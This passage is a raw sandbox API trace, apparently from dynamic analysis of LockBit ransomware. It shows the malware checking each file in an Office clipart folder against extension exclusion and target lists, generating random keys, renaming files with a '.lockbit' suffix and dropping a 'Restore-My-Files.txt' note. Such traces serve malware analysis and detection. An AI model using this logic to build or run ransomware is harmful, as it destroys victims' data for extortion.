(lpString1=".ndf", lpString2=".MID") returned 1 [0173.672] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0173.672] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0173.672] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0173.672] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0173.672] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0173.672] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0173.672] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0173.672] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0173.672] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID.lockbit") returned 72 [0173.672] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0173.678] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.678] malloc (_Size=0x40068) returned 0x1ff1e60 [0173.678] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5058) returned 1 [0173.678] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.678] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0173.679] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.679] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0173.679] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.681] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.681] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.681] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.682] free (_Block=0x1fa2ed8) [0173.682] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.682] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.682] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.683] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x18f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SHOW_01.MID", cAlternateFileName="")) returned 1 [0173.683] lstrcmpiW (lpString1=".", lpString2="SHOW_01.MID") returned -1 [0173.683] lstrcmpiW (lpString1="..", lpString2="SHOW_01.MID") returned -1 [0173.683] PathFindExtensionW (pszPath="SHOW_01.MID") returned=".MID" [0173.683] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0173.683] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0173.683] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0173.683] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0173.683] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0173.683] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0173.683] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0173.683] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0173.683] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0173.683] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0173.683] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0173.683] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0173.683] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0173.683] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0173.683] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0173.683] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0173.683] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0173.683] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0173.683] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0173.684] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0173.684] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0173.684] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0173.684] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0173.684] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0173.684] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0173.684] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0173.684] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0173.684] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0173.684] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0173.684] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0173.684] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0173.684] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0173.684] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0173.684] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0173.684] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0173.684] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0173.684] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0173.684] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0173.684] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0173.684] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0173.684] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0173.685] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0173.685] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0173.685] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0173.685] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0173.685] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0173.685] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0173.685] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SHOW_01.MID") returned -1 [0173.685] lstrcmpiW (lpString1="ntldr", lpString2="SHOW_01.MID") returned -1 [0173.685] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SHOW_01.MID") returned -1 [0173.685] lstrcmpiW (lpString1="bootsect.bak", lpString2="SHOW_01.MID") returned -1 [0173.685] lstrcmpiW (lpString1="autorun.inf", lpString2="SHOW_01.MID") returned -1 [0173.685] lstrcmpiW (lpString1="thumbs.db", lpString2="SHOW_01.MID") returned 1 [0173.685] lstrcmpiW (lpString1="iconcache.db", lpString2="SHOW_01.MID") returned -1 [0173.685] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.685] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned=".MID" [0173.685] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0173.685] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0173.685] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0173.685] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0173.685] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0173.685] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0173.685] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0173.686] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0173.686] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0173.686] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0173.686] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0173.686] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0173.686] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0173.686] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0173.686] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0173.686] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0173.686] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0173.686] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0173.686] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0173.686] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0173.686] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0173.686] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0173.686] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0173.686] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0173.686] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0173.686] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0173.686] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0173.686] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0173.686] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID.lockbit") returned 71 [0173.687] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0173.690] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.690] malloc (_Size=0x40068) returned 0x3d70450 [0173.690] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=6392) returned 1 [0173.690] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.691] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0173.691] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.692] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0173.692] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.694] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.694] malloc (_Size=0xa4) returned 0x1fa2ed8 [0173.694] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0173.695] free (_Block=0x1fa2ed8) [0173.695] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.695] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.695] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.695] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7d79200, ftCreationTime.dwHighDateTime=0x1bd4ae9, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa7d79200, ftLastWriteTime.dwHighDateTime=0x1bd4ae9, nFileSizeHigh=0x0, nFileSizeLow=0x2a0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL00256_.WMF", cAlternateFileName="")) returned 1 [0173.695] lstrcmpiW (lpString1=".", lpString2="SL00256_.WMF") returned -1 [0173.695] lstrcmpiW (lpString1="..", lpString2="SL00256_.WMF") returned -1 [0173.695] PathFindExtensionW (pszPath="SL00256_.WMF") returned=".WMF" [0173.695] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.695] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.695] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.695] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.696] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.696] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.697] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL00256_.WMF") returned -1 [0173.697] lstrcmpiW (lpString1="ntldr", lpString2="SL00256_.WMF") returned -1 [0173.697] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL00256_.WMF") returned -1 [0173.697] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL00256_.WMF") returned -1 [0173.697] lstrcmpiW (lpString1="autorun.inf", lpString2="SL00256_.WMF") returned -1 [0173.697] lstrcmpiW (lpString1="thumbs.db", lpString2="SL00256_.WMF") returned 1 [0173.697] lstrcmpiW (lpString1="iconcache.db", lpString2="SL00256_.WMF") returned -1 [0173.697] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.697] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00256_.WMF") returned=".WMF" [0173.698] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.698] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.698] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.699] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.699] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.699] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.699] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.699] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00256_.WMF.lockbit") returned 72 [0173.699] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00256_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0173.704] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.704] malloc (_Size=0x40068) returned 0x3e70008 [0173.704] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=10762) returned 1 [0173.704] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.704] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0173.704] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.705] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0173.705] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0173.707] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00256_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00256_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.707] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.707] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.708] free (_Block=0x1fa2ed8) [0173.708] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00256_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.708] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.708] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.708] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4440b00, ftCreationTime.dwHighDateTime=0x1bd4ae9, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4440b00, ftLastWriteTime.dwHighDateTime=0x1bd4ae9, nFileSizeHigh=0x0, nFileSizeLow=0x7ca4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL00260_.WMF", cAlternateFileName="")) returned 1 [0173.708] lstrcmpiW (lpString1=".", lpString2="SL00260_.WMF") returned -1 [0173.708] lstrcmpiW (lpString1="..", lpString2="SL00260_.WMF") returned -1 [0173.708] PathFindExtensionW (pszPath="SL00260_.WMF") returned=".WMF" [0173.708] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.708] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.708] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.708] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.708] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.708] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.708] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.708] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.708] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.708] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.708] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned 